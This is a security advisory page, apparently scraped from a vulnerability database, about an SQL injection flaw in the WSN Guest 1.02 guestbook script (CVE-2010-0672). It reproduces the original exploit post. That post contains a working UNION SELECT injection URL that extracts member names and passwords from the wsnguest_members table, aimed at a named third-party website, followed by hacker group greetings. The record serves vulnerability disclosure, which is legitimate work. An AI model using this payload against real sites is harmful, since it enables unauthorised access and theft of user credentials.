|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
If you have found a vulnerability, please send to our SecurityAlert Database : secalert()securityreason()com
Also if you have new ( 0-day ) exploit, please send to our ExploitAlert Archive :
exploit()securityreason()com |
|
|
Home SecurityAlert Database |
|
|
Topic : | WSN Guest 1.02 (orderlinks) SQL Injection Vulnerability
|
SecurityAlert : 7030
CVE : CVE-2010-0672
CWE : CWE-89
SecurityRisk : Medium (About)
Remote Exploit : Yes
Local Exploit : No
Victim interaction required : No
Exploit Available : Yes
Credit : Gamoscu
Published : 23.02.2010
Affected Software : | WSN Guest 1.02 |
 Advisory Content : WSN Guest 1.02 (orderlinks) SQL Injection Vulnerability
###########################
Author : Gamoscu
Homepage : http://www.1923turk.com
Blog : http://gamoscu.wordpress.com/
Script : WSN Guest 1.02
Download : http://scripts.webmastersite.net/wsnguest/wsnguest.zip
###########################
Exploat :index.php?page=20&orderlinks=SQL
http://www.maskimxul.nl/wsnguest/index.php?page=20&orderlinks=+and+1=0+unio
n+select+name,null,null,password,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20
,21,22,23+from+wsnguest_members--
##############################################################
# Greetz: Manas58 - Baybora - Delibey - Tiamo - Psiko - Turco - infazci -
X-TRO
##############################################################
Veda Turlarư :)
Feedback :
If you have additional information or notice any errors regarding this security advisory, please use contact form or email us at info()securityreason()com.
|
|
|
|